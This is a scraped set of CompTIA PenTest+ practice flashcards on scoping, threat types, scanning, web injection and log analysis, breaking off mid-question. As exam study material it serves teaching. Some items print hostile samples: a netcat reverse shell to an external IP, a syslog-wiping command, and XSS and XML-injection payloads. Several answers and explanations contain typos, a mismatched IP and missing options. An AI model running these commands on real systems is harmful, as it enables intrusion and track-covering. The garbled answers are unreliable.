CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon5 of 6) Flashcards

Question 1

Q

Your company, HackMe Incorporated, is a US-based company specializing in conducting penetration tests for large corporations. Big Corp has recently asked you to perform a penetration test of its offices in Saudi Arabia and Iran. The penetration test would include both remote attacks and on on-site USB key drop attack. Which of the following MUST you investigate BEFORE you begin to negotiate the contract for this engagement?

A.Support resources available to your team
B.Export restrictions that may apply to your tools
C.Type of threat actor your team will emulate
D.Budget allocate to the penetration test

Answer

A

.B.Export restrictions that may apply to your tools

Explanation: The United States has export restrictions that govern the shipment or transfer of software, technology, services, and other controlled items outside of the United States borders. The Export Administration Regulations (EAR) is regulated by the Bureau of Industry and Security (BIS) within the U.S. Department of Commerce. The EAR may control the export, re-export, or transfer of items such as software, hardware, algorithms, and other technical items you may require for your on-site penetration test. Exports can include the transfer of a physical product from inside the US to an external location and other actions. The simple act of releasing technology to someone other than a US citizen or lawful permanent resident within the United States is deemed an export. This includes making available software for electronic transmission that can be received by individuals outside the US.

Question 2

Q

Which of the following considerations should be discussed with a client during the engagement planning to determine if the penetration tester will need to bypass the requirement of gaining a PKI key for their host to connect to the client’s network?

A.Blacklisting
B.Certificate pinning
C.Organizational policies
D.Packet crafting

Answer

A

B.Certificate pinning

Explanation: OBJ-1.3: Certificate pinning is the process of associating a host with its expected X.509 certificate or public key. Pinning bypasses the certificate authority (CA) hierarchy and chain of trust to lessen the impact of man-in-the-middle attacks. If the client’s network uses certificate pinning, the penetration test may request an exception or a certificate issued to their machine.

Question 3

Q

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company’s network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company’s information security team.

How would you best classify this threat?

A.Advanced Persistent Threat

B.Spear Phishing

C.Insider threat

D.Privilege escalation

Answer

A

A.Advanced Persistent Threat

Explanation: OBJ-1.3: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. An APT attack intends to steal data rather than to cause damage to the network or organization. An APT refers to an adversary’s ongoing ability to compromise network security, obtain and maintain access, and use various tools and techniques. They are often supported and funded by nation-states or work directly for a nation-states’ government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. While an APT may use spear phishing, privilege escalation, or an insider threat to gain access to the system, the scenario presented in this question doesn’t specify what method was used. Therefore, APT is the best answer to select.

Question 4

Q

You have just completed writing the scoping document for your next penetration test, which clearly defines what tools, techniques, and targets you intend to include during your assessment. Which of the following actions should you take next?

A.Conduct a port scan of the target network
B.Get leadership concurrence on the scoping document
C.Conduct passive fingerprinting on the target servers
D.Provide a copy of the scoping document to local law enforcement

Answer

A

B.Get leadership concurrence on the scoping document

Explanation: OBJ-1.2: Once the scoping document has been prepared, you must get concurrence with your plan before you begin your penetration test. Therefore, you must get the scoping plan signed off by the organization’s leadership as your next action. You should never begin a penetration test before you have written permission and concurrence from the target organization. Port scanning of the target and even passive fingerprinting could be construed as a cybercrime if you did not get the scoping document signed off before beginning your assessment. There is no requirement to notify local law enforcement of your upcoming penetration test as long as you have a signed scoping document and contract with the targeted company.

Question 5

Q

Which of the following information is traditionally found in the SOW for a penetration test?

A.Timing of the scan
B.Format of the executive summary report
C.Excluded Hosts
D.Maintenance windows

Answer

A

C.Excluded Hosts

Explanation: OBJ-1.2: A Scope of Work (SOW) for a penetration test normally contains the list of excluded hosts. This ensures that the penetration tester does not affect hosts, workstations, or servers outside the assessment scope. The timing of the scan and the maintenance windows are usually found in the rules of engagement (ROE). The executive summary report contents are usually not identified in any of the scoping documents, only the requirement of whether such a report is to be delivered at the end of the assessment.

Question 6

Q

Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state?

A.Script Kiddies
B.Hacktivists
C.Advanced Persistent Threat
D.Ethical Hacker

Answer

A

C.Advanced Persistent Threat

Explanation: OBJ-1.3: Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization’s information systems. An ethical hacker is also known as a white hat hacker.

Question 7

Q

Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a penetration test?

A.Reverse engineering
B.Social Engineering
C.Denial-of-Service attack
D.Physical Penetration attempts

Answer

A

C.Denial-of-Service attack

Explanation OBJ-1.3: A denial-of-service or DoS attack isn’t usually included as part of a penetration test. This type of attack contains too much risk for an organization to allow it to be included in an assessment scope. Social engineering, physical penetration attempts, and reverse engineering are all commonly included in a penetration test’s scope.

Question 8

Q

You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment?

A.The make and model of the wireless access points used by the client
B.The number of wireless access points and devices used by the client
C.The frequencies of the wireless access points and devices used by the client
D.The network diagrams with the SSIDs of the wireless access points used by the client

Answer

A

C.The frequencies of the wireless access points and devices used by the client

Explanation OBJ-1.3: To ensure you are not accidentally targeting another organization’s wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, or AC and if they are using the 2.4 GHz or 5.0 GHz spectrum if they are using Wireless N or AC.

Question 9

Q

What is a formal document that states what will and will not be performed during a penetration test?

A.SOW
B.MSA
C.NDA
D.Corporate Policy

Answer

A

A.SOW

Explanation: OBJ-1.2: The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the assessment’s size and scope and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. A non-disclosure agreement (NDA) is a legal contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share for certain purposes but wish to restrict access. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

Question 10

Q

Based on some old SIEM alerts, you have been asked to perform a forensic analysis on a given host. You have noticed that some SSL network connections are occurring over ports other than port 443. The SIEM alerts indicate that copies of svchost.exe and cmd.exe have been found in the host’s %TEMP% folder. The logs indicate that RDP connections have previously connected with an IP address that is external to the corporate intranet, as well. What threat might you have uncovered during your analysis?

A.DDoS
B.APT
C.Ransomware
D.Software Vulnerability

Answer

A

B.APT

Explanation: OBJ-1.3: The provided indicators of compromise appear to be from an Advanced Persistent Threat (APT). These attacks tend to go undetected for several weeks or months and utilize secure communication to external IPs and Remote Desktop Protocol connections to provide the attackers with access to the infected host. While an APT might use a software vulnerability to gain their initial access, the full description provided in the question that includes the files being copied and executed from the %TEMP% folder and the use of SSL/RDP connections indicates longer-term exploitation, such as one caused by an APT.

Question 11

Q

What is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system called?

A.Threat hunting
B.Penetration testing
C.Information assurance
D.Incident response

Answer

A

A.Threat hunting

Explanation: OBJ-1.3: Threat hunting is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system. Penetration testing uses active tools and security utilities to evaluate security by simulating an attack on a system. A penetration test verifies that a threat exists, actively tests and bypasses security controls, and finally exploits vulnerabilities on the system. Information assurance (IA) is the practice of assuring information and managing risks related to the use, processing, storage, and transmission of information or data and the systems and processes used for those purposes. Incident response is an organized approach to addressing and managing the aftermath of a security breach or cyberattack, also known as an IT incident, computer incident, or security incident. The goal is to handle the situation to limit damage and reduce recovery time and costs.

Question 12

Q

You are a penetration tester hired by an organization that wants you to conduct a risk assessment of their DMZ. The company provided Rules of Engagement states that you must do all penetration testing from an external IP address without any prior knowledge of the internal IT system architecture. What kind of penetration test will you perform?

A.White box

B.Gray box

C.Red team

D.Black Box

Answer

A

D.Black Box

Explanation: OBJ-1.3: A black box penetration test requires no previous information and usually takes the approach of an uninformed attacker. The penetration tester has no prior information about the target system or network in a black box penetration test. These tests provide a realistic scenario for testing the defenses, but they can be costlier and takes much more time to conduct. A black box tester is examining a system from an outsider’s perspective. A gray-box tester has the user’s access and knowledge levels, potentially with elevated privileges on a system. Gray-box penetration testers typically have some knowledge of a network’s internals, potentially including design and architecture documentation and an account internal to the network. White-box testing goes by several different names, including clear-box, open-box, auxiliary and logic-driven testing. It falls on the opposite end of the spectrum from black-box testing, and penetration testers have full access to source code, architecture documentation, and so forth. Unlike black-box and gray-box testing, white-box penetration testers can perform static code analysis, so familiarity with source code analyzers, debuggers, and similar tools are necessary for this type of testing. A red team is a group that helps organizations to improve themselves by providing opposition to the point of view of the organization that they are helping. Penetration testers often work as part of a red team.

Question 13

Q

A security engineer is using the Kali Linux operating system and is writing exploits in C++.

What command should they use to compile their new exploit and name it notepad.exe?

A.g+ + exploit.cpp -o notepad.exe
B.g++ exploit.py -o notepad.exe
C.g+ + -i exploit.pl -e notepad.exe
D.g+ + –compile -i exploit.cpp notepad.exe

Answer

A

A.g+ + exploit.cpp -o notepad.exe

Explanation: OBJ-2.4: g++ is free C++ compiler that is available across a wide variety of operating systems, and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is “g++ filename -o outputfile”, so “g++ exploit.cpp -0 notepad.exe” is correct.

Question 14

Q

A vulnerability scan has returned the following results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Detailed Results

10.56.17.21 (APACHE-2.4)

Windows Shares Category:

Windows CVE ID: -

Vendor Ref: -

Bugtraq ID: -

Service Modified - 8.30.2017

Enumeration Results: print$ c:\windows\system32\spool\drivers files c:\FileShare\Accounting Temp c:\temp

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What best describes the meaning of this output?

A.There is an unknown bug in an Apache server with no Bugtraq ID
B.Connecting to the host using a null session allows enumeration of the share names on the host
C.Windows Defender has a known exploit that must be resolved or patched
D.There is no CVE present so this is a false positive caused by Apache running on a Windows Server

Answer

A

B.Connecting to the host using a null session allows enumeration of the share names on the host

Explanation: OBJ-2.3: These results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

Question 15

Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructor’s requirements and prevent students from using the “InstructorDemos” network?

A.MAC Filtering
B.NAT
C.QoS

Answer

A

A.MAC Filtering

Explanation: OBJ-2.5: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the student’s laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

Question 16

Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment. A portion of the scan results is shown below.

A.Information disclosure
B.Local file inclusion
C.SQL Injection
D.Session hijacking

Answer

A

A.Information disclosure

Explanation: OBJ-2.3: Information disclosure is any condition that allows the attacker to gain access to protected information. In this case, the server is vulnerable to disclosing information about the version of PHP being used. The phpinfo.php file should not be accessible to remote users over the internet, as it can be used to provide them with valuable information to help plan an attack.

Question 17

Q

What technique is an attacker using if they review data and publicly available information to gather intelligence about the target organization without scanning or other technical information-gathering activities?

A.Passive reconnaissance
B.Active scanning
C.VUlnerability scanning
D.Patch management

Answer

A

A.Passive reconnaissance

Explanation: OBJ-2.1: Passive reconnaissance combines publicly available data from various sources about an organization and does not use active scanning or data gathering methods. Vulnerability scanning is an inspection of the potential points of exploitation on a computer or network to identify security holes. A vulnerability scan is usually conducted to detect and classify system weaknesses in computers, networks, and communications equipment and predict the effectiveness of countermeasures. Patch management is the process that helps acquire, test, and install multiple patches (code changes) on existing applications and software tools on a computer, enabling systems to stay updated on existing patches and determining which patches are the appropriate ones.

Question 18

Q

You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true?

A.The attacker must have physical or logical access to the affected system
B.Exploiting the vulnerability requires the existence of specialized conditions
C.The attacker must have access to the local network that the system is connected to
D.Exploiting the vulnerabilities does not require any specialized conditions

Answer

A

C.The attacker must have access to the local network that the system is connected to

Explanation: OBJ-2.3: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.

Question 19

Q

Vulnerability scans must be conducted continuously to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the analyst do next?

A.Attempt to identify all the false positives and exceptions, then resolve any remaining items
B.Wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully
C.Place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities
D.Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first

Answer

A

D.Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first

Explanation: OBJ-2.3: PHI is an abbreviation for Personal Health Information. When attempting to remediate numerous vulnerabilities, it is crucial to prioritize the vulnerabilities to determine which ones should be remediated first. In this case, there is a regulatory requirement to ensure the security of the PHI data. Therefore, those critical assets to the secure handling or storage of PHI are of the highest risk should be prioritized for remediation first. It is impractical to resolve all 2,592 vulnerabilities at once. Therefore, you should not identify all the false positives and exceptions and then resolve any remaining items since they won’t be prioritized for remediation. You should also not wait to perform additional scanning because a scan is only a snapshot of your current status. If it takes 30 days to remediate all the vulnerabilities and do not scan, new vulnerabilities may have been introduced. Placing all the PHI assets into a sandbox will not work either because you have removed them from the production environment and can no longer serve their critical business functions.

Question 20

Q

You have been asked to determine if Dion Training’s web server is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server?

A.Vulnerability scan
B.Protocol analysis
C.Passive scan
D.Banner grabbing

Answer

A

D.Banner grabbing

Explanation: OBJ-2.1: Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting the web server’s response. This banner usually contains the server’s operating system and the version number of the service (SSH) being run. This is the fastest and easiest way to determine the SSH version being run on this web server. While it is possible to use a vulnerability scanner, protocol analyzer, or to conduct a passive scan to determine the SSH version, these are more time consuming and not fully accurate methods to determine the version being run.

Question 21

Q

What type of technique does exploit chaining often implement?

A.Injecting parameters into a connection string using semicolons as a separator
B.Inserting malicious JavaScript code into input parameters
C.Setting a users session identifier (SID) to an explicit known value
D.Adding multiple parameters with the same name in HTTP requested

Answer

A

A.Injecting parameters into a connection string using semicolons as a separator

Explanation OBJ-2.4: Connection String Parameter Pollution (CSPP) exploits specifically the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. CSPP, if carried out successfully, can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out (low access complexity) and the potential results it can have (high impact). Exploit chaining involves multiple commands and exploits being conducted in a series to fully attack or exploit a given target.

Question 22

Q

Your network security manager wants a monthly report of the security posture of all the assets on the network (e.g., workstations, servers, routers, switches, firewalls). The report should include any feature of a system or appliance that is missing a security patch, OS update, or other essential security feature and its risk severity. Which solution would work best to find this data?

A.Security policy
B.Penetration test
C.Virus scan
D.Vulnerability scanner

Answer

A

D.Vulnerability scanner

Explanation OBJ-2.2: A vulnerability scanner is a computer program designed to assess computers, computer systems, networks, or applications for weaknesses. Most vulnerability scanners also create an itemized report of their findings after the scan.

Question 23

Q

You have received a laptop from a user who recently left the company. You went to the terminal in the operating system and typed ‘history’ into the prompt and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

> for i in seq 255; ping -c 1 10.1.0.$i; done

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following best describes what actions were performed by this line of code?

A.Attempted to conduct a SYN scan on the network
B.Conducted a ping sweep on the subnet
C.Conducted a sequential ICMP echo reply to the subnet
D.Sequentially sent 255 ping packets to every host on the subnet

Answer

A

B.Conducted a ping sweep on the subnet

Explanation OBJ-2.1: This code is performing a ping sweep of the subnet 10.1.0.0/24. The code states that for every number in the sequence from 1 to 255, conduct a ping to 10.1.0.x, where x is the number from 1 to 255. When it completes this sequence, it is to return to the terminal prompt (done). The ping command uses an echo request and then receives an echo reply from the ping’s target. A ping sweep does not use an SYN scan, which would require the use of a tool like nmap or hping.

Question 24

Q

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?

A.netcat

B.telnet

C.wget

D.ftp

Answer

A

D.ftp

Explanation: OBJ-2.1: FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

Question 25

Q

Due to new regulations, your organization’s CIO has the information security team institute a vulnerability management program. What framework would BEST support this program’s establishment?

A.NIST
B.OWASP
C.SDLC
D.SANS

Answer

A

A.NIST

Explanation: OBJ-2.1: NIST (National Institute of Standards and Technology) produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program’s establishment and provide a series of guidelines and best practices. SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). The SDLC is the software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.

Question 26

Q

You have determined that your client uses several networked devices that rely on an embedded operating system during your reconnaissance. Which of the following methods would MOST likely be the best method for exploiting these?

A.Use social engineering to trick a user into opening a malicious APK
B.Use web-based exploits against the devices web interfaces
C.Identify a jail broken device for easy exploitation
D.Use a spearfishing campaign top trick a user into installing a RAT

Answer

A

B.Use web-based exploits against the devices web interfaces

Explanation: OBJ-2.5: Most embedded operating systems use a web interface to access their configurations for setup and installation. Focusing on this web interface and using common web-based exploits is usually one of the best methods of exploiting a device with an embedded OS.

Question 27

Q

During your reconnaissance, you have determined that your client’s employees all use Android smartphones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these?

A.Use social engineering to trick a user into opening a malicious APK
B.Use web-based exploits against the devices web interfaces
C.Identify a jailbroken device for easy exploitation
D.Use a tool like ICSSPLOIT to target specific vulnerabilities

Answer

A

A.Use social engineering to trick a user into opening a malicious APK

Explanation: OBJ-2.5: When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using Android-based devices, you can use social engineering to trick a user into installing a malicious APK. As a penetration tester, you can create a malicious APK using msfvenom in the Metasploit framework. The user can install it directly from your website instead of the Google Play store.

Question 28

Q

What command could be used to list the active services from the Windows command prompt?

A.sc query type=running
B.sc query \servername
C.sc query
D.sc config

Answer

A

C.sc query

Explanation: OBJ-2.1: Windows uses the sc query to display information about the running service. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service’s entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just the sc query, the command will return the information on the active services only. By using the type=running option, only the information on the running service will be displayed. If the command sc query \servername is used, then the remote server’s active services (\servername) will be displayed.

Question 29

Q

You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner’s findings in the automated report. Which of the following is MOST likely to be a false positive?

A.Reflected XSS
B.Insecure HTTP methods allowed
C.Command injection allowed
D.Directory listing enabled

Answer

A

C.Command injection allowed

Explanation: OBJ-2.3: A command injection is unlikely since this is a static webpage and does not accept any user input. A command injection allows the user to supply malicious input to the web server and then passes that data to a system shell for execution. In this sense, command injection does create new instances of execution and can, therefore, leverage languages that the web app does not directly support.

Question 30

Q

You have been asked to provide some training to Dion Training’s system administrators about the importance of proper patching of a system before deployment. To demonstrate the effects of deploying a new system without patching it first, you ask the system administrators to provide you with an image of a brand-new server they plan to deploy. How should you deploy the image to demonstrate the vulnerabilities exposed while maintaining the security of the corporate network?

A.Deploy the image to a brand new physical server, connect it to the corporate network, then conduct a vulnerability scan to demonstrate how many vulnerabilities are now on the network
B.Utilize a server with multiple virtual machine snapshots installed to it, restore from a known compromised image then scan it for vulnerabilities
C.Deploy the system image within a virtual machine, ensure it is an isolated sandbox environment, then scan it for vulnerabilities
D.Deploy the vulnerable image to a virtual machine on a physical server, create an ACL to restrict all incoming connections to the system, then scan it for vulnerabilties

Answer

A

C.Deploy the system image within a virtual machine, ensure it is an isolated sandbox environment, then scan it for vulnerabilities

Explanation OBJ-2.2: To ensure your corporate network’s safety, any vulnerable image you deploy should be done within a sandboxed environment. This will ensure that an outside attacker cannot exploit the vulnerabilities but will still allow you to show the vulnerabilities found during a scan to demonstrate how important patching is to the security of the server.

Question 31

Q

An insurance company has developed a new web application to allow its customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and used MSSQL for its backend database. You have been able to locate an application’s search form and introduced the following code in the search input field:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
IMG SRC=vbscript:msgbox(“Vulnerable_to_Attack”);> originalAttribute=”SRC” originalPath=”vbscript:msgbox(“Vulnerable_to_Attack “);>” -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application?

A.Cross-site request forgery
B.Command Injection
C.Cross-site scripting
D.SQL Injection

Answer

A

C.Cross-site scripting

Explanation: OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Question 32

Q

Your service desk has received many complaints from external users that a web application is responding slowly to requests and frequently receives a “connection timed out” error message when they attempt to submit information to the application.

Which software development best practice should have been implemented to prevent this from occurring?

A.Stress testing
B.Regression testing
C.Input validation
D.Fuzzing

Answer

A

A.Stress testing

Explanation: OBJ-3.2: Stress testing is a software testing activity that determines the robustness of software by testing beyond normal operating limits. Stress testing is essential for mission-critical software but can be used with all types of software. Stress testing is an important component of the capacity management process of IT service management. It ensures adequate resources are available to support the end user’s needs when an application goes into a production environment. Regression testing confirms that a recent program or code change has not adversely affected existing features. Input validation is the process of ensuring any user input have undergone cleansing to ensure it is properly formatted, correct, and useful. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program.

Question 33

Q

You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- https://www.diontraining.com/add_to_cart.php?itemId=5”+perItemPrice=”0.00”+quantity=”100”+/>

Answer

A

C.XML Injection Explanation: OBJ-3.4: This is an example of an XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter an application’s intended logic. XML Injection can cause the insertion of malicious content into resulting messages/documents. In this case, the URL is attempting to modify the server’s XML structure. The original XML structure would be: . By using the URL above, this would be modified to the following: . The result would be that a new line was added in the XML document that could be processed by the server. This line would allow 10 of the product at $0.00 to be added to the shopping cart, while 0 of the product at $50.00 is added to the cart. This defeats the integrity of the e-commerce store’s add to cart functionality through this XML injection. A SQL injection occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. The real key to answering this question is identifying the XML structured code being entered as part of the URL, shown by the bracketed data.

Question 34

Q

A security analyst wants to implement a layered defense posture for this network, so he uses multiple antivirus defensive layers, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?

A.Forensic attack
B.ARP Spoofing Attack
C.Social Engineering Attack
D.Scanning attack

Answer

A

C.Social Engineering Attack

Explanation: OBJ-3.1: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.

Question 35

Q

An attacker sends an email out to 100,000 random email addresses. In the email the attacker sent, it claims that “Your Bank of America account is locked out. Please click here to reset your password.” Which of the following attack types is being used?

A.Phishing
B.Whaling
C.Spear phishing
D.Vishing

Answer

A

A.Phishing

Explanation: OBJ-3.1: Phishing relies on sending out a large volume of email to a broad set of recipients in the hopes of collecting the desired action or information. Spearphishing involves targeting specific individuals using well-crafted emails to gather information from a victim.

Question 36

Q

You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

sc config schedule start auto net start schedule at 10:42 “”c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe “”

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What BEST describes what is occurring and what action do you recommend to stop it?

A.The host is using the WIndows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12 you should recommend removing the host from the network

B.The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely;No Recommendations is required since this is not malicious activity

C.The host is beaconing to 123.12.34.12 everyday at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network

D.The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network

Answer

A

A.The host is using the WIndows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12 you should recommend removing the host from the network

Explanation: OBJ-3.5: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.

Question 37

Q

Which of the following might be exploited on a Windows server to conduct a privilege escalation?

A.Ret2libc
B.Sticky bits
C.SAM database
D.SUID/SGID programs

Answer

A

C.SAM database

Explanation: OBJ-3.5: The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1, and 10 that stores users’ passwords. It authenticates local and remote users. The SAM uses cryptographic measures to prevent unauthenticated users from accessing the system but could be cracked offline using a password cracker to determine the administrative user’s passwords. Ret2libc, sticky bits, and SUID/SGID programs are WindLinuxows-specific privilege escalation techniques.

Question 38

Q

BigCorpData recently had suffered a massive data breach caused by a hacker. You have been hired as an expert to assist in their incident response and recovery. You look through the shell history on a Linux server and see the following entry: # echo “ “ > /var/log/syslog. Which of the following techniques did the attacker use to attempt to cover their tracks?

A.Erassing the syslog file securely
B.Changing or forging syslog entries
C.Clearing specific syslog entries
D.Clearing the syslog file

Answer

A

D.Clearing the syslog file

Explanation: OBJ-3.7: The attacker issued attempted to overwrite the /var/log/syslog file. If this command were successful, they would have overwritten all of the log’s contents with a single space character. If the server writes its logs to a centralized Syslog server, the original logs would still be available for review. Additionally, this method does not securely erase the file, and it could be restored from a backup or even from the hard drive using forensic techniques. If the attacker wanted to erase the file securely, they should have used the “shred -zu /var/log/syslog” command. This would overwrite the area of the hard drive that contained the file with zeros for increase security.

Question 39

Q

Jason is conducting a penetration test against an organization’s Windows network. This engagement aims to demonstrate what a trusted insider could do to the organization’s network. The organization provided Jason with a corporate laptop and a standard user account as an entry-level employee. He was able to download his exploit (exploit.exe) and some programs from SysInternals to his desktop. He then enters the following commands into the command shell from this standard user account:

-=-=-=-=-=-

C:\Users\jason\Desktop> exploit.exe This program has been blocked by group policy. Contact your administrator to enable this program.

C:\Users\jason\Desktop> accesschk.exe -uwcq “jason” * RW Apache

